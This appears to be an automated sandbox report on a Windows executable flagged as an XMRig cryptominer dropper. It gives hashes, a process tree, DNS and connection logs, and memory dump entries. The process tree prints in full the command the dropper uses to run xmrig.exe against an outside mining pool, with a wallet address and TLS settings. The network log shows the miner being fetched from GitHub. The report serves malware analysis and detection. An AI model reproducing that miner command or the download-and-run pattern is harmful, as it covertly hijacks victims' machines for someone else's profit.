Resubmissions

  • 06/07/2024, 19:03 UTC: 240706-xqksaazhrm (score 10)
  • 21/06/2024, 07:08 UTC: 240621-hyl8razgpc (score 10)
  • 16/06/2024, 18:48 UTC: 240616-xf5ppswgmq (score 10)
  • 16/06/2024, 18:34 UTC: 240616-w759wasbqf (score 10)
  • 16/06/2024, 18:21 UTC: 240616-wzje5swajj (score 10)
  • 16/06/2024, 18:08 UTC: 240616-wqxams1ekf (score 10)
  • 16/06/2024, 17:54 UTC: 240616-whbzqsvcrn (score 10)
  • 16/06/2024, 17:41 UTC: 240616-v9q3aszhkf (score 10)
  • 16/06/2024, 17:28 UTC: 240616-v1237szgpc (score 10)

Analysis

  • max time kernel
    144s
  • max time network
    159s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240704-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240704-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    06/07/2024, 19:03 UTC

General

  • Target

    main - Copy (4) - Copy.exe

  • Size

    6.9MB

  • MD5

    22c978ffaefef3389bf29068b9621661

  • SHA1

    5671972c1d70826fb85dced4c83c700dd282ea21

  • SHA256

    e6ee8e9b38e10a92a89e61b8655ca4fedcc381fd93cb36f43fe323132923dfcf

  • SHA512

    8a280cb782f0afab171d2e7955b75362e98cefd449d382004ef2568c2c230cd633a754b1dd5f0dc5e17407819e4dceb5b0cbb2647e279a6ec674b8d9484be26a

  • SSDEEP

    98304:7b5Ak7khMiyw0VREqfnle5EEPbxVhCQHSIMf:5LUMiywZqshDxaQHh

Score
10/10

Malware Config

Signatures

  • XMRig Miner payload 16 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Executes dropped EXE 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe
    "C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:4672
    • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
      xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:4452
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3708,i,13421008738336098502,1902686380018635081,262144 --variations-seed-version --mojo-platform-channel-handle=4208 /prefetch:8
    1⤵
      PID:4884

    Network

    • DNS 8.8.8.8.in-addr.arpa (remote address 8.8.8.8:53, US)
      Request: 8.8.8.8.in-addr.arpa IN PTR
      Response: dns.google
    • DNS 133.32.126.40.in-addr.arpa (remote address 8.8.8.8:53, US)
      Request: 133.32.126.40.in-addr.arpa IN PTR
      Response: (no answer)
    • DNS github.com, process main - Copy (4) - Copy.exe (remote address 8.8.8.8:53, US)
      Request: github.com IN A
      Response: 20.26.156.215
    • DNS objects.githubusercontent.com, process main - Copy (4) - Copy.exe (remote address 8.8.8.8:53, US)
      Request: objects.githubusercontent.com IN A
      Response: 185.199.111.133, 185.199.108.133, 185.199.109.133, 185.199.110.133
    • DNS 240.221.184.93.in-addr.arpa (remote address 8.8.8.8:53, US)
      Request: 240.221.184.93.in-addr.arpa IN PTR
      Response: (no answer)
    • DNS 26.35.223.20.in-addr.arpa (remote address 8.8.8.8:53, US)
      Request: 26.35.223.20.in-addr.arpa IN PTR
      Response: (no answer)
    • DNS 215.156.26.20.in-addr.arpa (remote address 8.8.8.8:53, US)
      Request: 215.156.26.20.in-addr.arpa IN PTR
      Response: (no answer)
    • DNS 133.111.199.185.in-addr.arpa (remote address 8.8.8.8:53, US)
      Request: 133.111.199.185.in-addr.arpa IN PTR
      Response: cdn-185-199-111-133.github.com
    • DNS pool.hashvault.pro, process xmrig.exe (remote address 8.8.8.8:53, US)
      Request: pool.hashvault.pro IN A
      Response: 45.76.89.70, 95.179.241.203
    • DNS 203.241.179.95.in-addr.arpa (remote address 8.8.8.8:53, US)
      Request: 203.241.179.95.in-addr.arpa IN PTR
      Response: 95.179.241.203.vultrusercontent.com
    • DNS 26.165.165.52.in-addr.arpa (remote address 8.8.8.8:53, US)
      Request: 26.165.165.52.in-addr.arpa IN PTR
      Response: (no answer)
    • DNS 206.23.85.13.in-addr.arpa (remote address 8.8.8.8:53, US)
      Request: 206.23.85.13.in-addr.arpa IN PTR
      Response: (no answer)
    • DNS 192.142.123.92.in-addr.arpa (remote address 8.8.8.8:53, US)
      Request: 192.142.123.92.in-addr.arpa IN PTR
      Response: a92-123-142-192.deploy.static.akamaitechnologies.com
    • DNS 29.243.111.52.in-addr.arpa (remote address 8.8.8.8:53, US)
      Request: 29.243.111.52.in-addr.arpa IN PTR
      Response: (no answer)
    Connections (remote address, domain, protocol, process; bytes sent / received; packets out / in)

    • 20.26.156.215:443 (github.com), tls, main - Copy (4) - Copy.exe: 1.6kB sent / 8.5kB received; 21 packets out / 18 in
    • 185.199.111.133:443 (objects.githubusercontent.com), tls, main - Copy (4) - Copy.exe: 131.6kB sent / 3.5MB received; 2615 packets out / 2624 in
    • 95.179.241.203:80 (pool.hashvault.pro), tls, xmrig.exe: 3.8kB sent / 8.7kB received; 26 packets out / 25 in
    • 8.8.8.8:53 (8.8.8.8.in-addr.arpa), dns: 66 B sent / 90 B received; 1 packet out / 1 in
      DNS request: 8.8.8.8.in-addr.arpa
    • 8.8.8.8:53 (133.32.126.40.in-addr.arpa), dns: 72 B sent / 158 B received; 1 packet out / 1 in
      DNS request: 133.32.126.40.in-addr.arpa
    • 8.8.8.8:53 (github.com), dns, main - Copy (4) - Copy.exe: 56 B sent / 72 B received; 1 packet out / 1 in
      DNS request: github.com
      DNS response: 20.26.156.215
    • 8.8.8.8:53 (objects.githubusercontent.com), dns, main - Copy (4) - Copy.exe: 75 B sent / 139 B received; 1 packet out / 1 in
      DNS request: objects.githubusercontent.com
      DNS response: 185.199.111.133, 185.199.108.133, 185.199.109.133, 185.199.110.133
    • 8.8.8.8:53 (240.221.184.93.in-addr.arpa), dns: 73 B sent / 144 B received; 1 packet out / 1 in
      DNS request: 240.221.184.93.in-addr.arpa
    • 8.8.8.8:53 (26.35.223.20.in-addr.arpa), dns: 71 B sent / 157 B received; 1 packet out / 1 in
      DNS request: 26.35.223.20.in-addr.arpa
    • 8.8.8.8:53 (215.156.26.20.in-addr.arpa), dns: 72 B sent / 158 B received; 1 packet out / 1 in
      DNS request: 215.156.26.20.in-addr.arpa
    • 8.8.8.8:53 (133.111.199.185.in-addr.arpa), dns: 74 B sent / 118 B received; 1 packet out / 1 in
      DNS request: 133.111.199.185.in-addr.arpa
    • 8.8.8.8:53 (pool.hashvault.pro), dns, xmrig.exe: 64 B sent / 96 B received; 1 packet out / 1 in
      DNS request: pool.hashvault.pro
      DNS response: 45.76.89.70, 95.179.241.203
    • 8.8.8.8:53 (203.241.179.95.in-addr.arpa), dns: 73 B sent / 122 B received; 1 packet out / 1 in
      DNS request: 203.241.179.95.in-addr.arpa
    • 8.8.8.8:53 (26.165.165.52.in-addr.arpa), dns: 72 B sent / 146 B received; 1 packet out / 1 in
      DNS request: 26.165.165.52.in-addr.arpa
    • 8.8.8.8:53 (206.23.85.13.in-addr.arpa), dns: 71 B sent / 145 B received; 1 packet out / 1 in
      DNS request: 206.23.85.13.in-addr.arpa
    • 8.8.8.8:53 (192.142.123.92.in-addr.arpa), dns: 73 B sent / 139 B received; 1 packet out / 1 in
      DNS request: 192.142.123.92.in-addr.arpa
    • 8.8.8.8:53 (29.243.111.52.in-addr.arpa), dns: 72 B sent / 158 B received; 1 packet out / 1 in
      DNS request: 29.243.111.52.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

      Filesize

      7.9MB

      MD5

      e2fe87cc2c7dab8ca6516620dccd1381

      SHA1

      f714ec0448325435103519452610cf7aadf8bbba

      SHA256

      d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4

      SHA512

      8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

    • memory/4452-14-0x0000023063B40000-0x0000023063B60000-memory.dmp

      Filesize

      128KB

    • memory/4452-15-0x0000023063C90000-0x0000023063CB0000-memory.dmp

      Filesize

      128KB

    • memory/4452-16-0x00007FF67DB40000-0x00007FF67E643000-memory.dmp

      Filesize

      11.0MB

    • memory/4452-18-0x0000023063CD0000-0x0000023063CF0000-memory.dmp

      Filesize

      128KB

    • memory/4452-17-0x0000023063CB0000-0x0000023063CD0000-memory.dmp

      Filesize

      128KB

    • memory/4452-19-0x00007FF67DB40000-0x00007FF67E643000-memory.dmp

      Filesize

      11.0MB

    • memory/4452-20-0x00007FF67DB40000-0x00007FF67E643000-memory.dmp

      Filesize

      11.0MB

    • memory/4452-23-0x0000023063CD0000-0x0000023063CF0000-memory.dmp

      Filesize

      128KB

    • memory/4452-22-0x0000023063CB0000-0x0000023063CD0000-memory.dmp

      Filesize

      128KB

    • memory/4452-21-0x00007FF67DB40000-0x00007FF67E643000-memory.dmp

      Filesize

      11.0MB

    • memory/4452-24-0x00007FF67DB40000-0x00007FF67E643000-memory.dmp

      Filesize

      11.0MB

    • memory/4452-25-0x00007FF67DB40000-0x00007FF67E643000-memory.dmp

      Filesize

      11.0MB

    • memory/4452-26-0x00007FF67DB40000-0x00007FF67E643000-memory.dmp

      Filesize

      11.0MB

    • memory/4452-27-0x00007FF67DB40000-0x00007FF67E643000-memory.dmp

      Filesize

      11.0MB

    • memory/4452-28-0x00007FF67DB40000-0x00007FF67E643000-memory.dmp

      Filesize

      11.0MB

    • memory/4452-29-0x00007FF67DB40000-0x00007FF67E643000-memory.dmp

      Filesize

      11.0MB

    • memory/4452-30-0x00007FF67DB40000-0x00007FF67E643000-memory.dmp

      Filesize

      11.0MB

    • memory/4452-31-0x00007FF67DB40000-0x00007FF67E643000-memory.dmp

      Filesize

      11.0MB

    • memory/4452-32-0x00007FF67DB40000-0x00007FF67E643000-memory.dmp

      Filesize

      11.0MB

    • memory/4452-33-0x00007FF67DB40000-0x00007FF67E643000-memory.dmp

      Filesize

      11.0MB